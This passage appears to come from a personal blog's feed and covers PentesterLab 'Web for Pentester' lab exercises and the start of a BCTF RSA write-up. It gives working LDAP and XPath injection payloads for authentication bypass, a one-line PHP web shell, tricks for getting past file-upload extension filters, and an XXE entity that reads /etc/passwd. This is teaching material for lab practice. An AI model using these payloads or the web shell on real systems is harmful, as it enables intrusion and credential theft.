<h3 id="Example_1-6">Example 1</h3><p>In this first example, you connect to a LDAP server, using your username and password. In this instance, The LDAP server does not authenticate you, since your credentials are invalid.</p>
<p>However, some LDAP servers authorise NULL Bind: if null values are sent, the LDAP server will proceed to bind the connection, and the PHP code will think that the credentials are correct. To get the bind with 2 null values, you will need to completely remove this parameter from the query. If you keep something like username=&password= in the URL, these values will not work, since they won’t be null; instead, they will be empty.</p>
<p>This is an important check to perform on all login forms that you will test in the future, even if the backend is not LDAP-based.</p>
<h3 id="Example_2-6">Example 2</h3><p>The most common pattern of LDAP injection is to be able to inject in a filter. Here, we will see how you can use LDAP injection to bypass an authentication check.</p>
<p>First, you need to learn a bit of LDAP syntax. When you are retrieving a user, based on its username, the following will be used:<br><figure class="highlight clojure"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="list">(<span class="keyword">cn=</span><span class="collection">[INPUT]</span>)</span></span><br></pre></td></tr></table></figure></p>
<p>If you want to add more conditions and some boolean logic, you can use:<br><figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A <span class="built_in">boolean</span> <span class="keyword">OR</span> <span class="keyword">using</span> |: (|(cn=[INPUT1])(cn=[INPUT2])) <span class="keyword">to</span> <span class="keyword">get</span> records matching [INPUT1] <span class="keyword">or</span> [INPUT2].</span><br><span class="line">A <span class="built_in">boolean</span> <span class="keyword">AND</span> <span class="keyword">using</span> &: (&(cn=[INPUT1])(userPassword=[INPUT2])) <span class="keyword">to</span> <span class="keyword">get</span> records <span class="keyword">for</span> which the cn matches [INPUT1] <span class="keyword">and</span> the password matches [INPUT2].</span><br></pre></td></tr></table></figure></p>
<p>As you can see, the boolean logic is located at the beginning of the filter. Since you’re likely to inject after it, it’s not always possible (depending on the LDAP server) to inject logic inside the filter, if it’s just (cn=[INPUT]).</p>
<p>LDAP uses the wildcard <em> character very often, to match any values. This can be used for match everything </em> or just substrings (for example, adm* for all words starting with adm).</p>
<p>As with other injections, we will need to remove anything added by the server-side code. We can get rid of the end of the filter, using a NULL BYTE (encoded as %00).</p>
<p>Here, we have a login script. We can see that if we use:</p>
<blockquote>
<ul>
<li>username=hacker&password=hacker we get authenticated (this is the normal request).</li>
<li>username=hack*&password=hacker we get authenticated (the wildcard matches the same value).</li>
<li>username=hacker&password=hac* we don’t get authenticated (the password may likely be hashed).</li>
</ul>
</blockquote>
<p>Now, we will see how we can use the LDAP injection, in the username parameter to bypass the authentication. Based on our previous tests, we can deduce that the filter probably looks like:<br><figure class="highlight clojure"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="list">(<span class="keyword">&</span><span class="list">(<span class="keyword">cn=</span><span class="collection">[INPUT1]</span>)</span><span class="list">(<span class="keyword">userPassword=HASH</span><span class="collection">[INPUT2]</span>)</span>)</span></span><br></pre></td></tr></table></figure></p>
<p>Where HASH is an unsalted hash (probably MD5 or SHA1).</p>
<p>LDAP supports several formats: <code>{CLEARTEXT}</code>, <code>{MD5}</code>, <code>{SMD5}</code> (salted MD5), <code>{SHA}</code>, <code>{SSHA}</code> (salted SHA1), <code>{CRYPT}</code> for storing passwords’.<br>Since [INPUT2] is hashed, we cannot use it to inject our payload.</p>
<p>Our goal here will be to inject inside [INPUT1] (the username parameter). We will need to inject:</p>
<blockquote>
<ul>
<li>The end of the current filter using hacker).</li>
<li>An always-true condition ((cn=*) for example)</li>
<li>A ) to keep a valid syntax and close the first ).</li>
<li>A NULL BYTE (%00) to get rid of the end of the filter.</li>
</ul>
</blockquote>
<p>Once you put this together, you should be able to login as hacker with any password. You can then try to find other users using the wildcard trick. For example, you can use a* in the first part of the filter, and check who you are logged in as.</p>
<p>In most cases, LDAP injection will allow only you to bypass authentication and authorisation checks. Retrieving arbitrary data (as opposed to just getting more results) is often really challenging or impossible.</p>
<h2 id="Upload">Upload</h2><p>In this section, we will cover how to use file upload functionalities to gain code execution.</p>
<p>In web applications (especially the ones using the file systems to determine what code should be run), you can get code execution on a server, if you manage to upload a file with the right filename (often depending on the extension). In this section, we will see the basics of these types of attacks.</p>
<p>First, since we are working on a PHP application, we will need a PHP web shell. A web shell is just a simple script or web application that runs the code or commands provided. For example, in PHP, the following code is a really simple web shell:<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="preprocessor"><?php</span></span><br><span class="line"> system(<span class="variable">$_GET</span>[<span class="string">"cmd"</span>]);</span><br><span class="line"><span class="preprocessor">?></span></span></span><br></pre></td></tr></table></figure></p>
<p>More complex web shells can perform advanced operations, such as providing database and file system access, or even TCP tunnelling.</p>
<h3 id="Example_1-7">Example 1</h3><p>The first example is a really basic upload form, with no restriction. By using the web shell above, and naming it with a .php extension you should be able to get it upload onto the server. Once it’s uploaded, you can access the script (with the parameter cmd=uname for example) to get command execution.</p>
<h3 id="Example_2-7">Example 2</h3><p>In this second example, the developer put a restriction on the file name. The file name cannot end with .php. To bypass this restriction, you can use one of the following methods:</p>
<blockquote>
<ul>
<li>change the extension to .php3. On other systems, extensions like .php4 or .php5 may also work. It depends on the configuration of the web server.</li>
<li>use an extension that Apache does not know .blah after the extension .php. Since Apache does not know how to handle the extension .blah, it will move to the next one: .php and run the PHP code.</li>
<li>upload a .htaccess file, enabling another extension to be ran by PHP (You can learn more about this technique in PentesterLab’s training: From <a href="https://pentesterlab.com/fromsqlitoshellpg_edition.html" target="_blank" rel="external">SQL Injection to Shell: PostgreSQL edition</a></li>
</ul>
</blockquote>
<p>Using one of these methods, you should be able to gain command execution.</p>
<h2 id="XML_related_attacks">XML related attacks</h2><p>In this section, XML related attacks will be detailed. These types of attacks are common with web services and with applications using XPath to retrieve a configuration setting from a XML file (for example, to know what backend they need to use to authenticate a user, based on the organisation’s name provided).</p>
<h3 id="Example_1-8">Example 1</h3><p>Some XML parsers will resolve external entities, and will allow a user controlling the XML message to access resources; for example to read a file on the system. The following entity can be declared, for example:<br><figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><<span class="exclamation_mark">!</span><span class="variable">ENTITY</span> <span class="function_or_atom">x</span> <span class="variable">SYSTEM</span> <span class="string">"file:///etc/passwd"</span>></span><br></pre></td></tr></table></figure></p>
<p>You will need to envelope this properly, in order to get it to work correctly:<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="doctype"><!DOCTYPE test [</span><br><span class="line"> <!ENTITY x SYSTEM "file:///etc/passwd">]></span></span><br></pre></td></tr></table></figure></p>
<p>You can then simply use the reference to x: &x; (don’t forget to encode &) to get the corresponding result inserted in the XML document during its parsing (server side).</p>
<p>In this example, the exploitation occurs directly inside a GET request, but it’s more likely that these types of requests are performed using a POST request, in a traditional web application. This issue is also really common with web services, and is probably the first test you want to do, when attacking an application that accepts XML messages.</p>
<p>This example can also be used to get the application to perform HTTP requests (by using http:// instead of file://) and can be used as a port scanner. However, the content retrieved is often incomplete since, the XML parser will try to parse it as part of the document.</p>
<p>You can also use <code>ftp://</code> and <code>https://</code></p>
<h3 id="Example_2-8">Example 2</h3><p>In this example, the code uses the user’s input, inside an XPath expression. XPath is a query language, which selects nodes from an XML document. Imagine the XML document as a database, and XPath as an SQL query. If you can manipulate the query, you will be able to retrieve elements to which you normally should not have access.</p>
<p>If we inject a single quote, we can see the following error:<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Warning: SimpleXMLElement::<span class="function"><span class="title">XPath</span><span class="params">()</span></span>: Invalid predicate <span class="keyword">in</span> /var/www/xml/example2<span class="class">.php</span> on line <span class="number">7</span> Warning: SimpleXMLElement::<span class="function"><span class="title">XPath</span><span class="params">()</span></span>: xmlXPathEval: evaluation failed <span class="keyword">in</span> /var/www/xml/example2<span class="class">.php</span> on line <span class="number">7</span> Warning: Variable passed to <span class="function"><span class="title">each</span><span class="params">()</span></span> is not an array or <span class="tag">object</span> <span class="keyword">in</span> /var/www/xml/example2<span class="class">.php</span> on line <span class="number">8</span></span><br></pre></td></tr></table></figure></p>
<p>Just like SQL injection, XPath allows you to do boolean logic, and you can try:</p>
<blockquote>
<ul>
<li>‘ and ‘1’=’1 and you should get the same result.</li>
<li>‘ or ‘1’=’0 and you should get the same result.</li>
<li>‘ and ‘1’=’0 and you should not get any result.</li>
<li>‘ or ‘1’=’1 and you should get all results.</li>
</ul>
</blockquote>
<p>Based on these tests and previous knowledge of XPath, it’s possible to get an idea of what the XPath expression looks like:<br><figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="list">[<span class="keyword">PARENT</span> NODES]/name<span class="list">[<span class="keyword">.=</span>'<span class="list">[<span class="keyword">INPUT</span>]']/<span class="list">[<span class="keyword">CHILD</span> NODES]</span></span></span></span></span><br></pre></td></tr></table></figure></p>
<p>To comment out the rest of the XPath expression, you can use a NULL BYTE (which you will need to encode as %00). As we can see in the XPath expression above, we also need to add a ] to properly complete the syntax. Our payload now looks like hacker’]%00 (or hacker’ or 1=1]%00 if we want all results).</p>
<p>If we try to find the child of the current node, using the payload<br><figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'%20or%201=1]/child::node()%00, we don'</span>t <span class="keyword">get</span> much information.</span><br></pre></td></tr></table></figure></p>
<p>Here, the problem is that we need to got back up in the node hierarchy, to get more information. In XPath, this can be done using parent::* as part of the payload. We can now select the parent of the current node, and display all the child node using<br><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">hacker</span>'<span class="number">%20</span>or<span class="number">%201</span>=1]/parent::*/child::node()<span class="number">%00</span>.</span><br></pre></td></tr></table></figure></p>
<p>One of the node’s value looks like a password. We can confirm this, by checking if the node’s name is password using the payload<br><figure class="highlight matlab"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hacker<span class="operator">'</span>]/parent::*/password<span class="comment">%00.</span></span><br></pre></td></tr></table></figure></p>
]]></content>
<summary type="html">
<![CDATA[<p>A few days ago, I did web for pentest from PentesterLab.Now, this is the writeup form PentesterLab.You also can go <a href="https://pentesterlab.com/exercises/web_for_pentester/course">here</a> to read the integral writeup.You also can go to <a href="http://lightless.me/archives/web-for-pentest-writeup.html">lightless’s blog</a> , my thoughts are similar with him.<br>]]>
</summary>
<category term="Code_Injection" scheme="http://edward-l.github.io/tags/Code-Injection/"/>
<category term="Command_Injection" scheme="http://edward-l.github.io/tags/Command-Injection/"/>
<category term="Directory_traversal" scheme="http://edward-l.github.io/tags/Directory-traversal/"/>
<category term="File_Upload" scheme="http://edward-l.github.io/tags/File-Upload/"/>
<category term="LDAP_Attacks" scheme="http://edward-l.github.io/tags/LDAP-Attacks/"/>
<category term="PentesterLab" scheme="http://edward-l.github.io/tags/PentesterLab/"/>
<category term="XML_Attacks" scheme="http://edward-l.github.io/tags/XML-Attacks/"/>
<category term="XSS" scheme="http://edward-l.github.io/tags/XSS/"/>
<category term="sql_injection" scheme="http://edward-l.github.io/tags/sql-injection/"/>
<category term="writeup" scheme="http://edward-l.github.io/categories/writeup/"/>
</entry>
<entry>
<title><![CDATA[BCTF-warmup-writeup]]></title>
<link href="http://edward-l.github.io/2015/04/24/BCTF-warmup-writeup/"/>
<id>http://edward-l.github.io/2015/04/24/BCTF-warmup-writeup/</id>
<published>2015-04-24T07:30:16.000Z</published>
<updated>2015-04-24T07:57:18.000Z</updated>
<content type="html"><![CDATA[<p>这道题是rsa的题,给了公钥,和c。<br><a id="more"></a><br><figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">-----BEGIN <span class="keyword">PUBLIC</span> <span class="keyword">KEY</span>-----</span><br><span class="line">MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAQEDZxmNa1YU6VgTrdjyKkcX</span><br><span class="line">vHK+HqvZM9G4aUT9t1uO0jC+YtfRtp0iIJXBKMhvggEuyxFhkf2dAYptAvhNsnvF</span><br><span class="line">GiEwfchvS/dxxpHBQ+Wr5Um1vS1usaIf1icOfhtI/gYR+<span class="number">7</span>LhsLNSTm9N6LTko0Xa</span><br><span class="line">RKE96CW3JgjbbHxKQLeCZubIe7/e9rSDgdScRQeli81Ht21ktFkIsVi9frxNrLCx</span><br><span class="line">z9bCwZV09A6y79Dp4Q3HAFytObyvUrnqw4czaNaQMcXnJGhKRPBo79HT3Altm11k</span><br><span class="line">EeWL3uQ+RrmaDQSUudsoGVr5Aa/xMNSm4gPa0I2lf6fkAmKlutsqMj7aKLRGlqsw</span><br><span class="line">XQKCAQEA85Wdl44C658G3vPzNdj4r9dgmVHdrGC3FLbCKvD6kS8hCzQga9JKlgHH</span><br><span class="line">jfSgJ18Qf9OrVS2VBX65NOcb3c1wRcJLGFh7jI/PWt1MXYPwx3yU3JxQy+Q44rZ7</span><br><span class="line">r9MWM7aq8XgdkMOtbwPQN7MyGAGyNUbUg+Z+JgZ/eyI0fdvAwtWSzoFMv138zBQU</span><br><span class="line">N/FOCzmQ+IBh5fC65fAeP6cNsOlgXnz9V16cge/uxSnDP9kDeiD9is1ROsljd2gx</span><br><span class="line">PmP5g4rjURzdCporUW8hSMjUdaNgoGNZRJc57s0lGrtCsBRXPkOfL6RXNVeyVpn/</span><br><span class="line">wR5jHOjul1qG5+JyvPX3apNFA0j+Pw==</span><br><span class="line">-----<span class="keyword">END</span> <span class="keyword">PUBLIC</span> <span class="keyword">KEY</span>-----</span><br></pre></td></tr></table></figure></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=<span class="number">0</span>x1e04304936215de8e21965cfca9c245b1a8f38339875d36779c0f123c475bc24d5eef50e7d9ff5830e80c62e8083ec55f27456c80b0ab26546b9aeb8af30e82b650690a2ed7ea407dcd094ab9c9d3d25a93b2140dcebae1814610302896e67f3ae37d108<span class="built_in">cd</span>029fae6362ea7ac1168974c1a747ec9173799e1107e7a56d783660418ebdf6898d7037cea25867093216c2c702ef3eef71f694a6063f5f0f1179c8a2afe9898ae8dec5bb393cdffa3a52a297<span class="built_in">cd</span>96d1ea602309ecf47<span class="built_in">cd</span>009829b44ed3100cf6194510c53c25ca7435f60ce5f4f614cdd2c63756093b848a70aade002d6bc8f316c9e5503f32d39a56193d1d92b697b48f5aa43417631846824b5e86</span><br></pre></td></tr></table></figure>
<p>做bctf的时候撸了一天都没有撸出来,因为数太大啦,拆分不了。<br>后来看了writeup,原来有一个黑魔法<a href="https://github.com/pablocelayes/rsa-wiener-attack" target="_blank" rel="external">rsa-wiener-attack</a>在github上。那就容易多了。<br>用<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl rsa -<span class="keyword">in</span> publickey<span class="class">.pub</span> -pubin -modulus -text</span><br></pre></td></tr></table></figure></p>
<p>得到了<br><figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">Modulus (<span class="number">2050</span> bit):</span><br><span class="line"><span class="label"> 03:</span><span class="number">67</span>:<span class="number">19</span>:<span class="number">8</span><span class="string">d:</span><span class="number">6</span><span class="string">b:</span><span class="number">56</span>:<span class="number">14</span>:<span class="string">e9:</span><span class="number">58</span>:<span class="number">13</span>:<span class="string">ad:</span><span class="string">d8:</span><span class="string">f2:</span><span class="number">2</span><span class="string">a:</span><span class="number">47</span>:</span><br><span class="line"><span class="label"> 17:</span><span class="string">bc:</span><span class="number">72</span>:<span class="string">be:</span><span class="number">1</span><span class="string">e:</span><span class="string">ab:</span><span class="string">d9:</span><span class="number">33</span>:<span class="string">d1:</span><span class="string">b8:</span><span class="number">69</span>:<span class="number">44</span>:<span class="string">fd:</span><span class="string">b7:</span><span class="number">5</span><span class="string">b:</span></span><br><span class="line"><span class="label"> 8e:</span><span class="string">d2:</span><span class="number">30</span>:<span class="string">be:</span><span class="number">62</span>:<span class="string">d7:</span><span class="string">d1:</span><span class="string">b6:</span><span class="number">9</span><span class="string">d:</span><span class="number">22</span>:<span class="number">20</span>:<span class="number">95</span>:<span class="string">c1:</span><span class="number">28</span>:<span class="string">c8:</span></span><br><span class="line"><span class="label"> 6f:</span><span class="number">82</span>:<span class="number">01</span>:<span class="number">2</span><span class="string">e:</span><span class="string">cb:</span><span class="number">11</span>:<span class="number">61</span>:<span class="number">91</span>:<span class="string">fd:</span><span class="number">9</span><span class="string">d:</span><span class="number">01</span>:<span class="number">8</span><span class="string">a:</span><span class="number">6</span><span class="string">d:</span><span class="number">02</span>:<span class="string">f8:</span></span><br><span class="line"><span class="label"> 4d:</span><span class="string">b2:</span><span class="number">7</span><span class="string">b:</span><span class="string">c5:</span><span class="number">1</span><span class="string">a:</span><span class="number">21</span>:<span class="number">30</span>:<span class="number">7</span><span class="string">d:</span><span class="string">c8:</span><span class="number">6</span><span class="string">f:</span><span class="number">4</span><span class="string">b:</span><span class="string">f7:</span><span class="number">71</span>:<span class="string">c6:</span><span class="number">91</span>:</span><br><span class="line"><span class="label"> c1:</span><span class="number">43</span>:<span class="string">e5:</span><span class="string">ab:</span><span class="string">e5:</span><span class="number">49</span>:<span class="string">b5:</span><span class="string">bd:</span><span class="number">2</span><span class="string">d:</span><span class="number">6</span><span class="string">e:</span><span class="string">b1:</span><span class="string">a2:</span><span class="number">1</span><span class="string">f:</span><span class="string">d6:</span><span class="number">27</span>:</span><br><span class="line"><span class="label"> 0e:</span><span class="number">7</span><span class="string">e:</span><span class="number">1</span><span class="string">b:</span><span class="number">48</span>:<span class="string">fe:</span><span class="number">06</span>:<span class="number">11</span>:<span class="string">fb:</span><span class="string">b2:</span><span class="string">e1:</span><span class="string">b0:</span><span class="string">b3:</span><span class="number">52</span>:<span class="number">4</span><span class="string">e:</span><span class="number">6</span><span class="string">f:</span></span><br><span class="line"><span class="label"> 4d:</span><span class="string">e8:</span><span class="string">b4:</span><span class="string">e4:</span><span class="string">a3:</span><span class="number">45</span>:<span class="string">da:</span><span class="number">44</span>:<span class="string">a1:</span><span class="number">3</span><span class="string">d:</span><span class="string">e8:</span><span class="number">25</span>:<span class="string">b7:</span><span class="number">26</span>:<span class="number">08</span>:</span><br><span class="line"><span class="label"> db:</span><span class="number">6</span><span class="string">c:</span><span class="number">7</span><span class="string">c:</span><span class="number">4</span><span class="string">a:</span><span class="number">40</span>:<span class="string">b7:</span><span class="number">82</span>:<span class="number">66</span>:<span class="string">e6:</span><span class="string">c8:</span><span class="number">7</span><span class="string">b:</span><span class="string">bf:</span><span class="string">de:</span><span class="string">f6:</span><span class="string">b4:</span></span><br><span class="line"><span class="label"> 83:</span><span class="number">81</span>:<span class="string">d4:</span><span class="number">9</span><span class="string">c:</span><span class="number">45</span>:<span class="number">07</span>:<span class="string">a5:</span><span class="number">8</span><span class="string">b:</span><span class="string">cd:</span><span class="number">47</span>:<span class="string">b7:</span><span class="number">6</span><span class="string">d:</span><span class="number">64</span>:<span class="string">b4:</span><span class="number">59</span>:</span><br><span class="line"><span class="label"> 08:</span><span class="string">b1:</span><span class="number">58</span>:<span class="string">bd:</span><span class="number">7</span><span class="string">e:</span><span class="string">bc:</span><span class="number">4</span><span class="string">d:</span><span class="string">ac:</span><span class="string">b0:</span><span class="string">b1:</span><span class="string">cf:</span><span class="string">d6:</span><span class="string">c2:</span><span class="string">c1:</span><span class="number">95</span>:</span><br><span class="line"><span class="label"> 74:</span><span class="string">f4:</span><span class="number">0</span><span class="string">e:</span><span class="string">b2:</span><span class="string">ef:</span><span class="string">d0:</span><span class="string">e9:</span><span class="string">e1:</span><span class="number">0</span><span class="string">d:</span><span class="string">c7:</span><span class="number">00</span>:<span class="number">5</span><span class="string">c:</span><span class="string">ad:</span><span class="number">39</span>:<span class="string">bc:</span></span><br><span class="line"><span class="label"> af:</span><span class="number">52</span>:<span class="string">b9:</span><span class="string">ea:</span><span class="string">c3:</span><span class="number">87</span>:<span class="number">33</span>:<span class="number">68</span>:<span class="string">d6:</span><span class="number">90</span>:<span class="number">31</span>:<span class="string">c5:</span><span class="string">e7:</span><span class="number">24</span>:<span class="number">68</span>:</span><br><span class="line"><span class="label"> 4a:</span><span class="number">44</span>:<span class="string">f0:</span><span class="number">68</span>:<span class="string">ef:</span><span class="string">d1:</span><span class="string">d3:</span><span class="string">dc:</span><span class="number">09</span>:<span class="number">6</span><span class="string">d:</span><span class="number">9</span><span class="string">b:</span><span class="number">5</span><span class="string">d:</span><span class="number">64</span>:<span class="number">11</span>:<span class="string">e5:</span></span><br><span class="line"><span class="label"> 8b:</span><span class="string">de:</span><span class="string">e4:</span><span class="number">3</span><span class="string">e:</span><span class="number">46</span>:<span class="string">b9:</span><span class="number">9</span><span class="string">a:</span><span class="number">0</span><span class="string">d:</span><span class="number">04</span>:<span class="number">94</span>:<span class="string">b9:</span><span class="string">db:</span><span class="number">28</span>:<span class="number">19</span>:<span class="number">5</span><span class="string">a:</span></span><br><span class="line"><span class="label"> f9:</span><span class="number">01</span>:<span class="string">af:</span><span class="string">f1:</span><span class="number">30</span>:<span class="string">d4:</span><span class="string">a6:</span><span class="string">e2:</span><span class="number">03</span>:<span class="string">da:</span><span class="string">d0:</span><span class="number">8</span><span class="string">d:</span><span class="string">a5:</span><span class="number">7</span><span class="string">f:</span><span class="string">a7:</span></span><br><span class="line"><span class="label"> e4:</span><span class="number">02</span>:<span class="number">62</span>:<span class="string">a5:</span><span class="string">ba:</span><span class="string">db:</span><span class="number">2</span><span class="string">a:</span><span class="number">32</span>:<span class="number">3</span><span class="string">e:</span><span class="string">da:</span><span class="number">28</span>:<span class="string">b4:</span><span class="number">46</span>:<span class="number">96</span>:<span class="string">ab:</span></span><br><span class="line"><span class="label"> 30:</span><span class="number">5</span>d</span><br><span class="line"><span class="string">Exponent:</span></span><br><span class="line"><span class="label"> 00:</span><span class="string">f3:</span><span class="number">95</span>:<span class="number">9</span><span class="string">d:</span><span class="number">97</span>:<span class="number">8</span><span class="string">e:</span><span class="number">02</span>:<span class="string">eb:</span><span class="number">9</span><span class="string">f:</span><span class="number">06</span>:<span class="string">de:</span><span class="string">f3:</span><span class="string">f3:</span><span class="number">35</span>:<span class="string">d8:</span></span><br><span class="line"><span class="label"> f8:</span><span class="string">af:</span><span class="string">d7:</span><span class="number">60</span>:<span class="number">99</span>:<span class="number">51</span>:<span class="string">dd:</span><span class="string">ac:</span><span class="number">60</span>:<span class="string">b7:</span><span class="number">14</span>:<span class="string">b6:</span><span class="string">c2:</span><span class="number">2</span><span class="string">a:</span><span class="string">f0:</span></span><br><span class="line"><span class="label"> fa:</span><span class="number">91</span>:<span class="number">2</span><span class="string">f:</span><span class="number">21</span>:<span class="number">0</span><span class="string">b:</span><span class="number">34</span>:<span class="number">20</span>:<span class="number">6</span><span class="string">b:</span><span class="string">d2:</span><span class="number">4</span><span class="string">a:</span><span class="number">96</span>:<span class="number">01</span>:<span class="string">c7:</span><span class="number">8</span><span class="string">d:</span><span class="string">f4:</span></span><br><span class="line"><span class="label"> a0:</span><span class="number">27</span>:<span class="number">5</span><span class="string">f:</span><span class="number">10</span>:<span class="number">7</span><span class="string">f:</span><span class="string">d3:</span><span class="string">ab:</span><span class="number">55</span>:<span class="number">2</span><span class="string">d:</span><span class="number">95</span>:<span class="number">05</span>:<span class="number">7</span><span class="string">e:</span><span class="string">b9:</span><span class="number">34</span>:<span class="string">e7:</span></span><br><span class="line"><span class="label"> 1b:</span><span class="string">dd:</span><span class="string">cd:</span><span class="number">70</span>:<span class="number">45</span>:<span class="string">c2:</span><span class="number">4</span><span class="string">b:</span><span class="number">18</span>:<span class="number">58</span>:<span class="number">7</span><span class="string">b:</span><span class="number">8</span><span class="string">c:</span><span class="number">8</span><span class="string">f:</span><span class="string">cf:</span><span class="number">5</span><span class="string">a:</span><span class="string">dd:</span></span><br><span class="line"><span class="label"> 4c:</span><span class="number">5</span><span class="string">d:</span><span class="number">83</span>:<span class="string">f0:</span><span class="string">c7:</span><span class="number">7</span><span class="string">c:</span><span class="number">94</span>:<span class="string">dc:</span><span class="number">9</span><span class="string">c:</span><span class="number">50</span>:<span class="string">cb:</span><span class="string">e4:</span><span class="number">38</span>:<span class="string">e2:</span><span class="string">b6:</span></span><br><span class="line"><span class="label"> 7b:</span><span class="string">af:</span><span class="string">d3:</span><span class="number">16</span>:<span class="number">33</span>:<span class="string">b6:</span><span class="string">aa:</span><span class="string">f1:</span><span class="number">78</span>:<span class="number">1</span><span class="string">d:</span><span class="number">90</span>:<span class="string">c3:</span><span class="string">ad:</span><span class="number">6</span><span class="string">f:</span><span class="number">03</span>:</span><br><span class="line"><span class="label"> d0:</span><span class="number">37</span>:<span class="string">b3:</span><span class="number">32</span>:<span class="number">18</span>:<span class="number">01</span>:<span class="string">b2:</span><span class="number">35</span>:<span class="number">46</span>:<span class="string">d4:</span><span class="number">83</span>:<span class="string">e6:</span><span class="number">7</span><span class="string">e:</span><span class="number">26</span>:<span class="number">06</span>:</span><br><span class="line"><span class="label"> 7f:</span><span class="number">7</span><span class="string">b:</span><span class="number">22</span>:<span class="number">34</span>:<span class="number">7</span><span class="string">d:</span><span class="string">db:</span><span class="string">c0:</span><span class="string">c2:</span><span class="string">d5:</span><span class="number">92</span>:<span class="string">ce:</span><span class="number">81</span>:<span class="number">4</span><span class="string">c:</span><span class="string">bf:</span><span class="number">5</span><span class="string">d:</span></span><br><span class="line"><span class="label"> fc:</span><span class="string">cc:</span><span class="number">14</span>:<span class="number">14</span>:<span class="number">37</span>:<span class="string">f1:</span><span class="number">4</span><span class="string">e:</span><span class="number">0</span><span class="string">b:</span><span class="number">39</span>:<span class="number">90</span>:<span class="string">f8:</span><span class="number">80</span>:<span class="number">61</span>:<span class="string">e5:</span><span class="string">f0:</span></span><br><span class="line"><span class="label"> ba:</span><span class="string">e5:</span><span class="string">f0:</span><span class="number">1</span><span class="string">e:</span><span class="number">3</span><span class="string">f:</span><span class="string">a7:</span><span class="number">0</span><span class="string">d:</span><span class="string">b0:</span><span class="string">e9:</span><span class="number">60</span>:<span class="number">5</span><span class="string">e:</span><span class="number">7</span><span class="string">c:</span><span class="string">fd:</span><span class="number">57</span>:<span class="number">5</span><span class="string">e:</span></span><br><span class="line"><span class="label"> 9c:</span><span class="number">81</span>:<span class="string">ef:</span><span class="string">ee:</span><span class="string">c5:</span><span class="number">29</span>:<span class="string">c3:</span><span class="number">3</span><span class="string">f:</span><span class="string">d9:</span><span class="number">03</span>:<span class="number">7</span><span class="string">a:</span><span class="number">20</span>:<span class="string">fd:</span><span class="number">8</span><span class="string">a:</span><span class="string">cd:</span></span><br><span class="line"><span class="label"> 51:</span><span class="number">3</span><span class="string">a:</span><span class="string">c9:</span><span class="number">63</span>:<span class="number">77</span>:<span class="number">68</span>:<span class="number">31</span>:<span class="number">3</span><span class="string">e:</span><span class="number">63</span>:<span class="string">f9:</span><span class="number">83</span>:<span class="number">8</span><span class="string">a:</span><span class="string">e3:</span><span class="number">51</span>:<span class="number">1</span><span class="string">c:</span></span><br><span class="line"><span class="label"> dd:</span><span class="number">0</span><span class="string">a:</span><span class="number">9</span><span class="string">a:</span><span class="number">2</span><span class="string">b:</span><span class="number">51</span>:<span class="number">6</span><span class="string">f:</span><span class="number">21</span>:<span class="number">48</span>:<span class="string">c8:</span><span class="string">d4:</span><span class="number">75</span>:<span class="string">a3:</span><span class="number">60</span>:<span class="string">a0:</span><span class="number">63</span>:</span><br><span class="line"><span class="label"> 59:</span><span class="number">44</span>:<span class="number">97</span>:<span class="number">39</span>:<span class="string">ee:</span><span class="string">cd:</span><span class="number">25</span>:<span class="number">1</span><span class="string">a:</span><span class="string">bb:</span><span class="number">42</span>:<span class="string">b0:</span><span class="number">14</span>:<span class="number">57</span>:<span class="number">3</span><span class="string">e:</span><span 